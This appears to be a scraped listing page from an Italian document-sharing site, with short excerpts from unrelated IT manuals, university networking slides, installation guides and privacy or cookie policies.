TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Modulo di Amministrazione Il modulo include tutte le principali funzioni di amministrazione e consente di gestire aspetti di configurazione

Dettagli

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO

SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO CLSMS SOFTWARE GESTIONE SMS DA INTERFACCE CL MANUALE D INSTALLAZIONE ED USO Sommario e introduzione CLSMS SOMMARIO INSTALLAZIONE E CONFIGURAZIONE... 3 Parametri di configurazione... 4 Attivazione Software...

Dettagli

COPERTURA WI-FI (aree chiamate HOT SPOT)

COPERTURA WI-FI (aree chiamate HOT SPOT) Wi-Fi Amantea Il Comune di Amantea offre a cittadini e turisti la connessione gratuita tramite tecnologia wi-fi. Il progetto inserisce Amantea nella rete wi-fi Guglielmo ( www.guglielmo.biz), già attivo

Dettagli

La presente guida illustra i passaggi fondamentali per gestire l account posta elettronica certificata (PEC) sui dispositivi Apple ipad.

La presente guida illustra i passaggi fondamentali per gestire l account posta elettronica certificata (PEC) sui dispositivi Apple ipad. La presente guida illustra i passaggi fondamentali per gestire l account posta elettronica certificata (PEC) sui dispositivi Apple ipad. OPERAZIONI PRELIMINARI Dal menu impostazioni andate su E-mail, Contatti,

Dettagli

Inidirizzi IP e Nomi di Dominio. Domain Name System. Spazio dei Nomi Piatto. Gestione dello Spazio dei Nomi

Inidirizzi IP e Nomi di Dominio. Domain Name System. Spazio dei Nomi Piatto. Gestione dello Spazio dei Nomi I semestre 03/04 Inidirizzi IP e Nomi di Dominio Domain Name System Prof. Vincenzo Auletta auletta@dia.unisa.it http://www.dia.unisa.it/professori/auletta/ Università degli studi di Salerno Laurea in Informatica

Dettagli

Il World Wide Web: nozioni introduttive

Il World Wide Web: nozioni introduttive Il World Wide Web: nozioni introduttive Dott. Nicole NOVIELLI novielli@di.uniba.it http://www.di.uniba.it/intint/people/nicole.html Cos è Internet! Acronimo di "interconnected networks" ("reti interconnesse")!

Dettagli

NetMonitor. Micro guida all uso per la versione 1.2.0 di NetMonitor

NetMonitor. Micro guida all uso per la versione 1.2.0 di NetMonitor NetMonitor Micro guida all uso per la versione 1.2.0 di NetMonitor Cos è NetMonitor? NetMonitor è un piccolo software per il monitoraggio dei dispositivi in rete. Permette di avere una panoramica sui dispositivi

Dettagli

FIRESHOP.NET. Gestione Utility & Configurazioni. Rev. 2014.3.1 www.firesoft.it

FIRESHOP.NET. Gestione Utility & Configurazioni. Rev. 2014.3.1 www.firesoft.it FIRESHOP.NET Gestione Utility & Configurazioni Rev. 2014.3.1 www.firesoft.it Sommario SOMMARIO Introduzione... 4 Impostare i dati della propria azienda... 5 Aggiornare il programma... 6 Controllare l integrità

Dettagli

Interfaccia Web per customizzare l interfaccia dei terminali e

Interfaccia Web per customizzare l interfaccia dei terminali e SIP - Session Initiation Protocol Il protocollo SIP (RFC 2543) è un protocollo di segnalazione e controllo in architettura peer-to-peer che opera al livello delle applicazioni e quindi sviluppato per stabilire

Dettagli

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it

Sicurezza delle reti wireless. Alberto Gianoli alberto.gianoli@fe.infn.it Sicurezza delle reti wireless Alberto Gianoli alberto.gianoli@fe.infn.it Concetti di base IEEE 802.11: famiglia di standard tra cui: 802.11a, b, g: physical e max data rate spec. 802.11e: QoS (traffic

Dettagli

La informiamo che Utroneo s.r.l. è il titolare del trattamento dei suoi dati personali.

La informiamo che Utroneo s.r.l. è il titolare del trattamento dei suoi dati personali. Come utilizziamo i suoi dati è un prodotto di ULTRONEO SRL INFORMAZIONI GENERALI Ultroneo S.r.l. rispetta il Suo diritto alla privacy nel mondo di internet quando Lei utilizza i nostri siti web e comunica

Dettagli

Livello di applicazione. Reti di Calcolatori. Corso di Laurea in Ingegneria Informatica. Livello di applicazione DNS A.A.

Livello di applicazione. Reti di Calcolatori. Corso di Laurea in Ingegneria Informatica. Livello di applicazione DNS A.A. Corso di Laurea in Ingegneria Informatica Reti di Calcolatori Livello di applicazione DNS A.A. 2013/2014 1 Livello di applicazione Web e HTTP FTP Posta elettronica SMTP, POP3, IMAP DNS Applicazioni P2P

Dettagli

MailStore Proxy è disponibile gratuitamente per tutti i clienti di MailStore Server all indirizzo http://www.mailstore.com/en/downloads.

MailStore Proxy è disponibile gratuitamente per tutti i clienti di MailStore Server all indirizzo http://www.mailstore.com/en/downloads. MailStore Proxy Con MailStore Proxy, il server proxy di MailStore, è possibile archiviare i messaggi in modo automatico al momento dell invio/ricezione. I pro e i contro di questa procedura vengono esaminati

Dettagli

Gestione Nuova Casella email

Gestione Nuova Casella email Gestione Nuova Casella email Per accedere alla vecchia casella questo l indirizzo web: http://62.149.157.9/ Potrà essere utile accedere alla vecchia gestione per esportare la rubrica e reimportala come

Dettagli

Manuale di Remote Desktop Connection. Brad Hards Urs Wolfer Traduzione: Luciano Montanaro Traduzione: Daniele Micci

Manuale di Remote Desktop Connection. Brad Hards Urs Wolfer Traduzione: Luciano Montanaro Traduzione: Daniele Micci Manuale di Remote Desktop Connection Brad Hards Urs Wolfer Traduzione: Luciano Montanaro Traduzione: Daniele Micci 2 Indice 1 Introduzione 5 2 Il protocollo Remote Frame Buffer 6 3 Uso di Remote Desktop

Dettagli

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus

EUROPEAN COMPUTER DRIVING LICENCE. IT Security. Syllabus EUROPEAN COMPUTER DRIVING LICENCE IT Security Syllabus Scopo Questo documento presenta il syllabus di ECDL Standard IT Security. Il syllabus descrive, attraverso i risultati del processo di apprendimento,

Dettagli

BPEL: Business Process Execution Language

BPEL: Business Process Execution Language Ingegneria dei processi aziendali BPEL: Business Process Execution Language Ghilardi Dario 753708 Manenti Andrea 755454 Docente: Prof. Ernesto Damiani BPEL - definizione Business Process Execution Language

Dettagli

Gestore Comunicazioni Obbligatorie. Progetto SINTESI. Comunicazioni Obbligatorie. Modulo Applicativo COB. - Versione Giugno 2013 -

Gestore Comunicazioni Obbligatorie. Progetto SINTESI. Comunicazioni Obbligatorie. Modulo Applicativo COB. - Versione Giugno 2013 - Progetto SINTESI Comunicazioni Obbligatorie Modulo Applicativo COB - Versione Giugno 2013-1 Versione Giugno 2013 INDICE 1 Introduzione 3 1.1 Generalità 3 1.2 Descrizione e struttura del manuale 3 1.3 Requisiti

Dettagli

REAL WORLD AND VIRTUAL WORLD ARCHITECTURE FOR INTERCONN INTERCONNECTING FIRST AND SECOND LIFE

REAL WORLD AND VIRTUAL WORLD ARCHITECTURE FOR INTERCONN INTERCONNECTING FIRST AND SECOND LIFE REAL WORLD AND VIRTUAL WORLD ARCHITECTURE FOR INTERCONNECTING FIRST AND SECOND LIFE Università degli studi di Catania Facoltà di Ingegneria 26 Gennaio 2009 Sommario 1 Introduzione 2 Middleware Middleware:

Dettagli

EndNote Web. Quick Reference Card THOMSON SCIENTIFIC

EndNote Web. Quick Reference Card THOMSON SCIENTIFIC THOMSON SCIENTIFIC EndNote Web Quick Reference Card Web è un servizio online ideato per aiutare studenti e ricercatori nel processo di scrittura di un documento di ricerca. ISI Web of Knowledge, EndNote

Dettagli

GESTIONE ATTREZZATURE

GESTIONE ATTREZZATURE SOLUZIONE COMPLETA PER LA GESTIONE DELLE ATTREZZATURE AZIENDALI SWSQ - Solution Web Safety Quality srl Via Mons. Giulio Ratti, 2-26100 Cremona (CR) P. Iva/C.F. 06777700961 - Cap. Soc. 10.000,00 I.V. -

Dettagli

PRIVACY POLICY MARE Premessa Principi base della privacy policy di Mare Informativa ai sensi dell art. 13, d. lgs 196/2003

PRIVACY POLICY MARE Premessa Principi base della privacy policy di Mare Informativa ai sensi dell art. 13, d. lgs 196/2003 PRIVACY POLICY MARE Premessa Mare Srl I.S. (nel seguito, anche: Mare oppure la società ) è particolarmente attenta e sensibile alla tutela della riservatezza e dei diritti fondamentali delle persone e

Dettagli

Scrivere uno script php che, dato un array associativo PERSONE le cui chiavi sono i

Scrivere uno script php che, dato un array associativo PERSONE le cui chiavi sono i Esercizi PHP 1. Scrivere uno script PHP che produca in output: 1. La tabellina del 5 2. La tavola Pitagorica contenuta in una tabella 3. La tabellina di un numero ricevuto in input tramite un modulo. Lo

Dettagli

Cross Software ltd Malta Pro.Sy.T Srl. Il gestionale come l'avete sempre sognato... Pag. 1

Cross Software ltd Malta Pro.Sy.T Srl. Il gestionale come l'avete sempre sognato... Pag. 1 Il gestionale come l'avete sempre sognato... Pag. 1 Le funzionalità di X-Cross La sofisticata tecnologia di CrossModel, oltre a permettere di lavorare in Internet come nel proprio ufficio e ad avere una

Dettagli

Rational Asset Manager, versione 7.1

Rational Asset Manager, versione 7.1 Rational Asset Manager, versione 7.1 Versione 7.1 Guida all installazione Rational Asset Manager, versione 7.1 Versione 7.1 Guida all installazione Note Prima di utilizzare queste informazioni e il prodotto

Dettagli

Installazione ed attivazione della "SUITE OFFIS" versione SERVER

Installazione ed attivazione della SUITE OFFIS versione SERVER Installazione ed attivazione della "SUITE OFFIS" versione SERVER Premessa La versione server di OFFIS può essere installata e utilizzata indifferentemente da PC/Win o Mac/Osx e consente l'accesso contemporaneo

Dettagli

Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore)

Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore) Manuale d uso Apache OpenMeetings (Manuale Utente + Manuale Amministratore) Autore: Matteo Veroni Email: matver87@gmail.com Sito web: matteoveroni@altervista.org Fonti consultate: http://openmeetings.apache.org/

Dettagli

Tutela dei dati personali Vi ringraziamo per aver visitato il nostro sito web e per l'interesse nella nostra società. La tutela dei vostri dati privati riveste per noi grande importanza e vogliamo quindi

Dettagli

Comandi filtro: sed. Se non si specificano azioni, sed stampa sullo standard output le linee in input, lasciandole inalterate.

Comandi filtro: sed. Se non si specificano azioni, sed stampa sullo standard output le linee in input, lasciandole inalterate. Comandi filtro: sed Il nome del comando sed sta per Stream EDitor e la sua funzione è quella di permettere di editare il testo passato da un comando ad un altro in una pipeline. Ciò è molto utile perché

Dettagli

Guida dell amministratore

Guida dell amministratore Guida dell amministratore Le informazioni e il contenuto del presente documento vengono forniti esclusivamente a scopi informativi e come sono, senza garanzie di alcun tipo, sia espresse che implicite,

Dettagli

GUIDA alla configurazione di un DVR o Router su dyndns.it. in modalità compatibile www.dyndns.org

GUIDA alla configurazione di un DVR o Router su dyndns.it. in modalità compatibile www.dyndns.org GUIDA alla configurazione di un DVR o Router su dyndns.it in modalità compatibile www.dyndns.org Questa semplice guida fornisce le informazioni necessarie per eseguire la registrazione del proprio DVR

Dettagli

Allegato 8 MISURE MINIME ED IDONEE

Allegato 8 MISURE MINIME ED IDONEE Allegato 8 MISURE MINIME ED IDONEE SOMMARIO 1 POLITICHE DELLA SICUREZZA INFORMATICA...3 2 ORGANIZZAZIONE PER LA SICUREZZA...3 3 SICUREZZA DEL PERSONALE...3 4 SICUREZZA MATERIALE E AMBIENTALE...4 5 GESTIONE

Dettagli

INFORMATIVA SUI COOKIE

INFORMATIVA SUI COOKIE INFORMATIVA SUI COOKIE I Cookie sono costituiti da porzioni di codice installate all'interno del browser che assistono il Titolare nell erogazione del servizio in base alle finalità descritte. Alcune delle

Dettagli

iphone in azienda Guida alla configurazione per gli utenti

iphone in azienda Guida alla configurazione per gli utenti iphone in azienda Guida alla configurazione per gli utenti iphone è pronto per le aziende. Supporta Microsoft Exchange ActiveSync, così come servizi basati su standard, invio e ricezione di e-mail, calendari

Dettagli

Museo&Web CMS Tutorial: installazione di Museo&Web CMS Versione 0.2 del 16/05/11

Museo&Web CMS Tutorial: installazione di Museo&Web CMS Versione 0.2 del 16/05/11 Museo&Web CMS Tutorial: installazione di Museo&Web CMS Versione 0.2 del 16/05/11 Museo & Web CMS v1.5.0 beta (build 260) Sommario Museo&Web CMS... 1 SOMMARIO... 2 PREMESSE... 3 I PASSI PER INSTALLARE MUSEO&WEB

Dettagli

Funzioni di base. Manualino OE6. Outlook Express 6

Funzioni di base. Manualino OE6. Outlook Express 6 Manualino OE6 Microsoft Outlook Express 6 Outlook Express 6 è un programma, incluso nel browser di Microsoft Internet Explorer, che ci permette di inviare e ricevere messaggi di posta elettronica. È gratuito,

Dettagli

Conferencing Services. Web Meeting. Quick Start Guide V4_IT

Conferencing Services. Web Meeting. Quick Start Guide V4_IT Web Meeting Quick Start Guide V4_IT Indice 1 INFORMAZIONI SUL PRODOTTO... 3 1.1 CONSIDERAZIONI GENERALI... 3 1.2 SISTEMI OPERATIVI SUPPORTATI E LINGUE... 3 1.3 CARATTERISTICHE... 3 2 PRENOTARE UNA CONFERENZA...

Dettagli

2 Requisiti di sistema 4 2.1 Requisiti software 4 2.2 Requisiti hardware 5 2.3 Software antivirus e di backup 5 2.4 Impostazioni del firewall 5

2 Requisiti di sistema 4 2.1 Requisiti software 4 2.2 Requisiti hardware 5 2.3 Software antivirus e di backup 5 2.4 Impostazioni del firewall 5 Guida introduttiva Rivedere i requisiti di sistema e seguire i facili passaggi della presente guida per distribuire e provare con successo GFI FaxMaker. Le informazioni e il contenuto del presente documento

Dettagli

Manuale installazione KNOS

Manuale installazione KNOS Manuale installazione KNOS 1. PREREQUISITI... 3 1.1 PIATTAFORME CLIENT... 3 1.2 PIATTAFORME SERVER... 3 1.3 PIATTAFORME DATABASE... 3 1.4 ALTRE APPLICAZIONI LATO SERVER... 3 1.5 ALTRE APPLICAZIONI LATO

Dettagli

WEB Conference, mini howto

WEB Conference, mini howto Prerequisiti: WEB Conference, mini howto Per potersi collegare o creare una web conference è necessario: 1) Avere un pc con sistema operativo Windows XP o vista (windows 7 non e' ancora certificato ma

Dettagli

Gestione posta elettronica (versione 1.1)

Gestione posta elettronica (versione 1.1) Gestione posta elettronica (versione 1.1) Premessa La presente guida illustra le fasi da seguire per una corretta gestione della posta elettronica ai fini della protocollazione in entrata delle mail (o

Dettagli

REGIONE EMILIA-ROMAGNA Atti amministrativi

REGIONE EMILIA-ROMAGNA Atti amministrativi REGIONE EMILIA-ROMAGNA Atti amministrativi GIUNTA REGIONALE Atto del Dirigente: DETERMINAZIONE n 597 del 23/01/2012 Proposta: DPG/2012/462 del 13/01/2012 Struttura proponente: Oggetto: Autorità emanante:

Dettagli

Introduzione ad Access

Introduzione ad Access Introduzione ad Access Luca Bortolussi Dipartimento di Matematica e Informatica Università degli studi di Trieste Access E un programma di gestione di database (DBMS) Access offre: un supporto transazionale

Dettagli

2014 Electronics For Imaging. Per questo prodotto, il trattamento delle informazioni contenute nella presente pubblicazione è regolato da quanto

2014 Electronics For Imaging. Per questo prodotto, il trattamento delle informazioni contenute nella presente pubblicazione è regolato da quanto 2014 Electronics For Imaging. Per questo prodotto, il trattamento delle informazioni contenute nella presente pubblicazione è regolato da quanto previsto in Avvisi legali. 23 giugno 2014 Indice 3 Indice...5

Dettagli

Privacy Policy del sito http://www.plastic-glass.com

Privacy Policy del sito http://www.plastic-glass.com Cos'è una PRIVACY POLICY Privacy Policy del sito http://www.plastic-glass.com Questo documento, concernente le politiche di riservatezza dei dati personali di chi gestisce il sito Internet http://www.plastic-glass.com

Dettagli